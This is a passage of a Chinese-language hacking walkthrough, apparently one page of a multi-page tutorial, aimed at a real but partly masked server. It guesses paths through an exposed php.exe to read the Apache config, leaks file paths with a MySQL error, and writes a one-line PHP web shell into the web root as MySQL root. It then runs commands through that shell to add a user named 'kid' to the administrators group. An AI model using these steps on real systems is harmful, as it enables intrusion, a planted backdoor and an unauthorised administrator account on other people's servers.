方apache的conf文件的物理位置了
http://211.87.xxx.xxx/php/php.exe?c:\apache\conf\httpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?d:\apache\conf\httpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?e:\apache\conf\httpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?c:\Program Files\apache\conf\httpd.conf
No input file specified.
http://211.87.xxx.xxx/php/php.exe?f:\apache\conf\httpd.conf
猜到了，返回了好多东西
找到我们想要的
# DocumentRoot: The directory out of which you will serve your
# documents. By default, all requests are taken from this directory, but
# symbolic links and aliases may be used to point to other locations.
#
DocumentRoot "D:\homepage"
看得出来对方的主目录是D:\homepage
下面的事就好办了，现在就想得到shell?
先别急，我们先来看看另一种方法
那就是利用mysql的错误
随便的浏览一下他的网页找到一处利用mysql的地方
http://211.87.xxx.xxx/skonline/study/list.php?id=14

长得太帅了，哈哈哈哈
提交
http://211.87.xxx.xxx/skonline/study/list.php?id=14
返回
Warning: Supplied argument is not a valid MySQL result resource in

d:\homepage\skonline\study\list.php on line 231
呵呵，一览无余。
然后，然后就是制造我们的shell
mysql -h 211.87.xxx.xxx -u root -p
password:
Welcome to the MySQL monitor. Commands end with or \g.
Your MySQL connection id is 18 to server version: 3.23.53-max-nt

Type help; or \h for help. Type \c to clear the buffer.

mysql> use test;
Database changed
mysql> create table t(cmd text);
Query OK, 0 rows affected (0.08 sec)

mysql> insert into t values(<?system($c);?>);
Query OK, 1 row affected (12.52 sec)

mysql> select * from t into d:\\homepage\\test.php;

我的shell很简单<?system($c);?>，不到20个字符，但他已经足够了
可以让我执行任意命令，由此足以看出php的强大。

怎么用？
提交
http://211.87.xxx.xxx/test.php?c=net ;user kid /add
命令成功完成
http://211.87.xxx.xxx/test.php?c=net ;localgroup administrators kid /add
命令成功完成

呵呵，测试成功，通过！

上一页  [1] [2] [3] 下一页